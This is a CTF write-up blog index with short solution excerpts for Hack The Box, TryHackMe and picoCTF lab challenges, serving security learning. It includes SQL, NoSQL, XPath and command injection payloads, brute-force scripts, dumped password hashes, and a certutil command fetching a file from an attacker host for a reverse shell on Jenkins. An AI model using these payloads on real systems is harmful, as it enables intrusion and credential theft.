
emacab98

Penetration tester, cyber security student, CTF enthusiast. The writeups on this page aren't the most beautiful ones nor the most explicative, but they are supposedly short and to the point. If you need a nudge in the right direction or you want a second look on a machine you completed, these are quick reads for your fast-paced, (hopefully) ethical, hacker life. Merry Hacking!

Carpediem - HTB - Key Points

Target's IP: 10.10.11.167
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
Hostname revealed: carpediem.htb
Through subdomain enumeration, we can find a new domain name as well: portal.carpediem.htb
There is a request subject to SQL injection:
GET /?p=bikes&c=c4ca4238a0b923820dcc509a6f75849b'%2b(selectfrom(select(sleep(20)))a)%2b'
Automating with SQLmap, we can dump the entire database, including the admin's hash:
1,uploads/1635793020HONDAXADV.png,Male,<blank>,jhammond@carpediem.htb,Hamm...

Health - HTB - Key Points

Target's IP: 10.10.11.176
Hostname: health.htb
The functionality of the website calls for SSRF, and that is indeed the case. We can bypass the filter on the website using an open redirect, as shown on Hacktricks.
Redirecting to the filtered port 3000, we get the source code of a Gogs page. Checking for Gogs on the internet, there is a known SQL injection vulnerability we can exploit:
python2 redirect.py --port 80 --ip 10.10.14.40 "http://10.10.11.176:3000/api/v1/users/search?q=e')/**/union/**/all/...

MetaTwo - HTB - Key Points

Target's IP: 10.10.11.186
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
Unknown host: metapress.htb
Proudly powered by WordPress. Let's enumerate using wpscan.
[i] Plugin(s) Identified:
[+] bo...

BabyEncryption - HTB - Challenges

import string
#from secret import MSG
#ct = encryption(MSG)
# msg.enc holds the hex-encoded ciphertext; each byte was produced as (123 * p + 18) % 256
with open('./msg.enc', 'r') as f:
    text = bytes.fromhex(f.readline().strip())
result = ""
alphabet = string.printable
# for every ciphertext byte, brute force the printable plaintext character that maps to it
for char in text:
    for letter in alphabet:
        if (123 * ord(letter) + 18) % 256 == char:
            result += letter
            break
print(result)

Toxic - HTB - Challenges

Challenge's address: 139.59.189.189:32670
Checking out the source code attached to the challenge, it's easy to spot the call to unserialize. Following this blog post, https://snoopysecurity.github.io/web-application-security/2021/01/08/02_php_object_injection_exploitation-notes.html, we note that the only model defined in the challenge also implements the __destruct magic method, which will help us in our exploitation.
The method includes files, so it will let us read them: we have an LFI on our hands. Fi...

Ambassador - HTB - Key Points

Target's IP: 10.10.11.183
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  ppp
3306/tcp open  mysql
Grafana on 3000 is subject to unauthenticated arbitrary file read, as per https://www.exploit-db.com/exploits/50581
Reading passwd, consul, grafana and developer are users on the box.
Googling for common configuration files, we can read /etc/grafana/grafana.ini:
# Either "mysql", "postgres" or "sqlite3", it's your choice
;type = sqlite3
;host = 127.0.0.1:3306
;name = grafana
;user = roo...

Phonebook - HTB - Challenges

To exploit the wildcard SQL injection, this script helps us to identify the username:
import requests
import string

alphabet = string.digits + string.ascii_lowercase + string.ascii_uppercase + string.punctuation
word = ''
# guess the username one character at a time: a login that redirects to the
# root page means the prefix plus wildcard matched an existing account
# (the '*' wildcard characters were lost in extraction and are assumed here)
while True:
    for letter in alphabet:
        x = requests.post('http://165.22.122.58:31348/login',
                          data={'username': word + letter + '*', 'password': '*'})
        if x.url == 'http://165.22.122.58:31348/':
            word = word + letter
            print(word)
            break
    else:
        # no character extends the prefix any further: the username is complete
        break
With a slight modificat...

Shared - HTB - Key Points

Target's IP: 10.10.11.172
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https
Root page / redirects to: http://shared.htb
Subdomain enumeration returns checkout as a valid subdomain, so we also add checkout.shared.htb to the hosts file.
Ecommerce software by Prestashop seems subject to an exploit, more specifically https://www.exploit-db.com/exploits/45964, but I was not able to make it work.
The customcart cookie is injectable, the answer when requesting the page on the checkout ...

UpDown - HTB - Key Points

Target's IP: 10.10.11.177
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
Connecting to the website leaks a domain name, siteisup.htb
Recursive brute forcing of directories reveals the following two:
/dev
/dev/.git
Downloading the .git is easy thanks to directory indexing, just run wget -r http://siteisup.htb/dev/.git
Analyzing the git repo, there is an interesting commit we must check out:
commit 8812785e31c879261050e72e20f298ae8c43b565
Author: Abdou.Y <84577967+ab2pentest@users.noreply.gith...

Faculty - HTB - Key Points

Target's IP: 10.10.11.169
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
http-title: Did not follow redirect to http://faculty.htb
Javascript on the login page suggests that if you intercept the response and change 3 to 1 you can bypass the login.
cblake@faculty.htb
ejames@faculty.htb
jsmith@faculty.htb
sqlmap -u 'http://faculty.htb/view_schedule.php?id=1' -T users --dump
Administrator | 1    | 1fecbe762af147c1176a0fc2c722a345 | admin
Generating PDFs as an authenticated user, you can see that the tool used to ...

Shoppy - HTB - Key Points

Target's IP: 10.10.11.180
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9093/tcp open  copycat
The login suffers from NoSQL injection; we can bypass the login stage with
username=admin'||'1==1//&password=aaasa
Again, injecting the user search and downloading the export:
username "admin"
password "23c6877d9e2b564ef8b32c3a23de27b2"
username "josh"
password "6ebcea65320589ca4f2f1ce039975995"
These look like md5 hashes, trying hashcat to crack them:
6ebcea65320589ca4f2f1ce039...

Photobomb - HTB - Key Points

Target's IP: 10.10.11.182
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
Trying to connect to the web server reveals an important piece of information:
Unknown host: photobomb.htb
Connecting to the web server returns 401 - Unauthorized to all requests, but from the developer tools we see that the page includes a Javascript file that contains sensitive information:
function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/...

Support - HTB - Key Points

Target IP: 10.10.11.174
nmap -sS -p- -T4 --min-rate=10000 10.10.11.174
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-12 09:18 CEST
Nmap scan report for 10.10.11.174
Host is up (0.11s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldap...

Trick - HTB - Key Points

Target's IP: 10.10.11.166
nmap -sS -p- -T4 --min-rate=10000 10.10.11.166
PORT   STATE SERVICE
22/tcp open  ssh
25/tcp open  smtp
53/tcp open  domain
80/tcp open  http
└─# nslookup
> server 10.10.11.166
Default server: 10.10.11.166
Address: 10.10.11.166#53
> 10.10.11.166
166.11.10.10.in-addr.arpa       name = trick.htb.
We add this domain name to our /etc/hosts file. Now we can enumerate further for subdomains.
Asking for a zone transfer with
dig axfr trick.htb @trick.htb
reveals a new subdomain, preprod-...

Vulnnet Endgame - THM - Key Points

Initial scan reveals 22 and 80. We also have a domain name from the introduction of the box, so we can enumerate for subdomains.
Run gobuster vhost -u http://vulnnet.thm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
I found 4 more valid domains: blog, api, shop and admin1.
Brute forcing for directories in the admin1 domain reveals some interesting ones, like vendor, fileadmin, typo3temp, typo3.
Typo3 seems to be an open source CMS; we lack credentials to log in though.
Analyzing th...

RingZer0CTF - Hash me if you can

We need to create a small script in order to be quick enough to solve this challenge, as we cannot possibly copy the message, hash it and send the correct request in under two seconds. The script to solve this challenge is fairly straightforward, here it is:
import requests
import hashlib
x = requests.get('http://challenges.ringzer0team.com:10013/')
if '----- BEGIN MESSAGE -----' in x.text:
    start = x.text.index('----- BEGIN MESSAGE -----') + len('----- BEGIN MESSAGE -----') + 15 #15 is required to...

Nunchuks - HTB - Key Points

Open ports: 22, 80 and 443 after a super quick scan.
The certificate from 443 reveals a domain, nunchucks.htb
Subdomain enumeration reveals another possible target, store.nunchucks.htb
The store has a newsletter subscription function that reflects the email address provided. Using Wappalyzer, we can see the website is running on NodeJS, so let's look for SSTI on NodeJS.
Hacktricks suggests the following payload to try out: {{7*7}}. This should return 49. It is the payload listed under the template engine ...

Shocker - HTB - Key Points

Open port on 80 and a 2222 which is actually SSH on deeper inspection (detect the specific service using -sV in nmap).
Enumeration of the web server won't reveal much besides a cgi-bin directory; fuzzing for scripts returns a user.sh script.
We can try and exploit this with Shellshock, using the metasploit module exploit/multi/http/apache_mod_cgi_bash_env_exec. This gives us low privileged access on the box.
Running "id" we see our user is part of the lxd group, meaning we can immediately escalate to...

basic-mod-2 - picoCTF 2022

import string

# the flag alphabet: A-Z, 0-9 and "_" (37 symbols, indexed 1..37)
alphabet = string.ascii_uppercase + string.digits + "_"
code = "104 85 69 354 344 50 149 65 187 420 77 127 385 318 133 72 206 236 206 83 342 206 370"
words = code.split(" ")
result = ""
for word in words:
    module = int(word) % 41
    # brute force the modular inverse of (word mod 41) mod 41; that inverse is the 1-based alphabet index
    for i in range(41):
        if (module * i) % 41 == 1:
            result += alphabet[i-1]
            break
print(result)

basic-mod-1 - picoCTF 2022

import string

# the flag alphabet: A-Z, 0-9 and "_" (37 symbols, indexed 0..36)
alphabet = string.ascii_uppercase + string.digits + "_"
code = "202 137 390 235 114 369 198 110 350 396 390 383 225 258 38 291 75 324 401 142 288 397"
words = code.split(" ")
result = ""
# each number reduced mod 37 is an index into the alphabet
for word in words:
    result += alphabet[int(word) % 37]
print(result)

substitution0, 1 and 2 - picoCTF 2022

Uncomment cipher, plain and crypt to solve either the first, second or third substitution challenge.
Always start with the assumption that the last few words are "the flag is picoCTF{<something>}" and that you already have the substitution for some of the letters. With these, you can try to understand what is missing by looking at the English text and add letters to the substitution until you get a fully formed text (and the flag).
#cipher = '''QWITJSYHXCNDFERMUKGOPVALBZ
#Hjkjpmre Djykqet qkrgj, axo...

transposition-trial - PicoCTF 2022

cipher = "heTfl g as iicpCTo{7F4NRP051N51635P3X51N3_V091B0AE}2"
result = ""
# the plaintext was scrambled in groups of three: the third character of every
# group comes first, followed by the first and the second
for i in range(2, len(cipher), 3):
    result += cipher[i] + cipher[i-2] + cipher[i-1]
print(result)

Most Cookies - PicoCTF

Followed the explanation at this link. Just remember to put your cookie inside the cookie variable and update the wordlist with the possible secrets used to sign the cookie.
import flask
import hashlib
from sys import argv
from flask.json.tag import TaggedJSONSerializer
from itsdangerous import URLSafeTimedSerializer, TimestampSigner, BadSignature
cookie = 'eyJ2ZXJ5X2F1dGgiOiJibGFuayJ9.Yh4n3A.tAnfOTWKodF6TbdczS-Pt-JPzdM'
wordlist = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbre...

caas - PicoCTF

Look at the JS provided: at a first glance you might think there is some SSTI involved, but once you look at the code it's clear that Node runs a system command with the user input inserted into it. We only need to stop the current command and start something more useful. A combination of a semicolon and anything else you might want to use is fine. For example, I used ls to see file names in the current directory and then printed the one that interested me, like this:
https://caas.mars.picoctf.net/...

X marks the spot - pico

import requests
import string

chars = string.ascii_lowercase + string.ascii_uppercase + string.digits + "}_"
flag = "picoCTF{"
# XPath injection oracle: the page answers "right path" when the guessed prefix
# matches the start of a text node, so the flag is recovered one character at a time
while not flag.endswith("}"):
    for char in chars:
        result = requests.post("http://mercury.picoctf.net:20297/",
                               data={"name": "' or //*[starts-with(text(), '" + flag + char + "')] or 'a'='b",
                                     "pass": "pass"})
        if "right path" in result.text:
            flag += char
            print("Added char: " + flag)
            break

Zeno - THM

At first, after a basic scan, there is only TCP port 12340 open and SSH on 22. Connecting to it using netcat reveals this is an Apache 2.4.6 webserver, running PHP 5.4.16.
Using a directory scanner, we find out there is RMS installed on the webserver.
In our manual scraping of the website, we notice that, once we create an account, we get a sample message from an account called "administrator", and in the Contact Us section there is an email address that is registered to the domain pathfi...

Skynet - THM - Braindump

There is a web server and samba running; automatically scan both using dirb and enum4linux.
The web page served is a useless search, nothing in the source code either.
Anonymous listing is enabled on the samba server, and there are some directories to examine.
Dirb returned a login form exposed on a /squirrelmail directory; there is also a version number: 1.4.23
There is a known RCE for this version, but it requires login credentials. Maybe we have a username (milesdyson), but what about the password?
In the meanwhil...

Alfred - THM - Braindump

There are two web servers, one on 80 revealing an email address, and one on 8080 that is a Jenkins login page. Jenkins has, notoriously, a poor password policy.
Searching on Google, the default is admin. Tried simple combinations, admin:admin worked.
We can modify the configuration for the existing project and insert a build command to run when building it, so we can try to launch a reverse shell from it.
We can use this command in the build:
certutil.exe -urlcache -split -f http://10.9.4.63:8000/Advanced....

Steel Mountain - THM - Braindump

After an initial scan, there are ports that suggest this is a Windows box. There is also a web server on 80 that shows an image and nothing more. Nothing found using dirbuster.
There is also another web server, on 8080. Reading the source of the page, this shows a name and a version, Rejetto HFS 2.3. There are some known RCE exploits for this specific version, one in metasploit called exploit/windows/http/rejetto_hfs_exec, let's try this one. Seems to work, meterpreter shell opened. We are user bill in...

Road - THM

There is an SSH port open and a web server. With no credentials, the web server is the better option right now.
I started by looking around the website: there is the information about who created the platform right in front of you, but I could not turn that into valuable info with a basic search. I registered an account and logged in. Snoop around the authenticated pages, and you see there is a functionality to upload a profile picture, but it is admin-only. However, this tells us the ema...